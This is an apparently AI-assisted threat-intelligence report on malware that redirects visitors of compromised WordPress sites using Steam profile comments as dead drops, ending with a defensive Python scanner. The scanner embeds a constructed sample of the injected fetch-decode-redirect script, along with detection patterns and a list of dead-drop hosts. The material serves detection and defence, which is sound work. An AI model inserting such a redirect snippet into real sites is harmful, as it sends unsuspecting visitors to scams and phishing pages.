[TIMESTAMP: 2026-06-01 18:06 UTC] [AUTHOR: Runtime Rebel Intel] [SEVERITY: HIGH]

WordPress Sites Targeted by Malware Using Steam Profile Dead-Drops

AI-Assisted Analysis
// executive briefing tl;dr
  • [01] Attackers are redirecting traffic from over 2,000 compromised WordPress sites to malicious domains using legitimate third-party platforms for obfuscation.
  • [02] Affected systems include WordPress environments where unauthorized script injections have occurred in core files or active themes.
  • [03] Defenders must implement file integrity monitoring and review outbound network traffic for unusual connections to Steam Community profile pages.

Overview of the Steam-Based Malware Campaign

A sophisticated malware campaign has compromised nearly 2,000 WordPress websites, using a novel technique to obfuscate its C2 infrastructure. According to BleepingComputer, the threat actors use Steam Community profile comments as dead-drop resolvers that host encoded redirection instructions. This lets the malware bypass security filters that flag connections to known malicious domains, because the initial request goes to a high-reputation site (steamcommunity.com).

The campaign primarily aims to redirect legitimate site visitors to a variety of malicious destinations, including technical support scams, phishing pages, and unauthorized advertisements. By hijacking the trust associated with an established gaming platform, the attackers maintain persistence and evade detection by standard web application firewalls.

Analysis of WordPress Malware Steam Profile C2 Resolution

The technical execution of this campaign begins with the injection of a malicious JavaScript snippet into the victim’s WordPress environment. This script is often appended to legitimate files such as functions.php or header templates. Rather than hardcoding the final destination URL, which would be an easily identifiable IoC, the script is programmed to fetch content from a specific Steam Community profile.

The Dead-Drop Mechanism

The attackers populate the ‘About’ section or the comment history of a Steam profile with a Base64-encoded string. The injected script on the WordPress site performs the following actions:

  1. It initiates an asynchronous request to the Steam profile page.
  2. It parses the HTML response to locate a specific string or delimiter.
  3. It extracts the Base64-encoded data, which contains the actual C2 server address or the final redirect URL.
  4. It decodes this string on the fly and redirects the user’s browser to the intended malicious target.

This architecture provides the threat actors with significant agility. If a C2 server is taken down, they simply update the string on the Steam profile to point to a new infrastructure. This prevents the need to re-infect the 2,000+ WordPress sites, as the redirection logic remains centralized on the Steam platform.

Evasion and Persistence Tactics

Security professionals often struggle with this specific TTP because the traffic patterns appear benign at first glance. Most EDR and SIEM solutions are configured to trust traffic to and from major content delivery networks and social platforms. By using Steam as an intermediary, the attackers effectively “blind” many automated detection systems.

Furthermore, the malware often employs cookies to ensure that the redirect only triggers once per user session. This makes manual verification difficult for a SOC analyst, as subsequent visits to the infected site may appear perfectly normal. The script may also check for the presence of administrative cookies or specific user-agent strings to avoid triggering when a site owner is logged in, further extending the lifespan of the infection.

Detection and Mitigation Strategies

To effectively defend against these threats, administrators must move beyond basic signature-based detection. Understanding how to detect WordPress malware redirect scripts requires a combination of file integrity monitoring and network traffic analysis.

Actionable Recommendations:

  • File Integrity Monitoring: Implement tools that alert on any changes to core WordPress files or active theme directories. Pay particular attention to wp-includes and wp-content/themes where these scripts are frequently hidden.
  • Outbound Traffic Filtering: Monitor server-side logs for unusual outbound requests to external social media or gaming platforms. While Steam is a legitimate site, a web server hosting a blog or business site has no functional requirement to communicate with it.
  • Script Auditing: Regularly audit external scripts and look for obfuscated JavaScript or calls to atob() (Base64 decoding) that are paired with external network requests.
  • Security Plugins: Utilize reputable security plugins that perform deep scans for known malicious patterns and unauthorized injections.
  • Credential Hygiene: Ensure all administrative accounts use strong, unique passwords and multi-factor authentication to prevent the initial compromise via brute force or credential stuffing.
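As an added defensive example (not code from this article or from BleepingComputer), the heuristics behind the Script Auditing and Outbound Traffic Filtering items above, applied to constructed sample theme files that mimic the fetch, parse, atob() and redirect chain described under The Dead-Drop Mechanism, plus constructed server-side egress log lines. The file paths, the profile id placeholder and the log format are assumptions.

```python
import re

# Hosts a WordPress server has no functional reason to contact (constructed list;
# the campaign described on this page uses steamcommunity.com as its dead drop).
DEAD_DROP_HOSTS = {"steamcommunity.com"}

# Constructed sample theme files: one carrying an injected resolver, one clean.
SAMPLE_FILES = {
    "wp-content/themes/demo/functions.php": """<?php
function demo_footer() { ?>
<script>
fetch('https://steamcommunity.com/profiles/PLACEHOLDER_ID').then(r => r.text())
  .then(t => { var m = t.match(/##(.+?)##/); if (m) location.href = atob(m[1]); });
</script>
<?php }""",
    "wp-content/themes/demo/header.php": """<?php wp_head(); ?>
<script src="/wp-includes/js/jquery/jquery.min.js"></script>""",
}

NETWORK_CALL = re.compile(r"(?:\bfetch|\bXMLHttpRequest|\$\.(?:get|ajax))\s*\(")
DECODE_CALL = re.compile(r"\batob\s*\(")
EXTERNAL_HOST = re.compile(r"https?://([a-z0-9.-]+)", re.I)
REDIRECT = re.compile(r"\blocation(?:\.href)?\s*=|\blocation\.replace\s*\(")

def audit_script(source):
    """Heuristic audit of one file's contents; returns findings (empty = clean)."""
    findings = []
    has_net, has_decode = bool(NETWORK_CALL.search(source)), bool(DECODE_CALL.search(source))
    hosts = {h.lower() for h in EXTERNAL_HOST.findall(source)}
    if has_net and has_decode:
        findings.append("external request paired with atob()")
    if hosts & DEAD_DROP_HOSTS:
        findings.append("references dead-drop host: " + ", ".join(sorted(hosts & DEAD_DROP_HOSTS)))
    if has_decode and REDIRECT.search(source):
        findings.append("decoded value feeds a browser redirect")
    return findings

def audit_files(files):
    """Map path -> findings for every file that produced at least one finding."""
    return {path: f for path, src in files.items() if (f := audit_script(src))}

# Constructed egress log, assumed format: "<timestamp> <process> <destination host>".
SAMPLE_EGRESS_LOG = [
    "2026-06-01T18:00:01Z php-fpm api.wordpress.org",
    "2026-06-01T18:00:07Z php-fpm steamcommunity.com",
    "2026-06-01T18:00:09Z php-fpm downloads.wordpress.org",
]

def suspicious_egress(lines):
    """(timestamp, host) for each server-side connection to a dead-drop host."""
    return [(ts, host.lower()) for ts, _proc, host in (line.split() for line in lines)
            if host.lower() in DEAD_DROP_HOSTS]
```

Run the audit over a real theme directory by reading each file into the same mapping shape; any file that scores all three findings warrants an immediate integrity comparison against a known-good copy.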
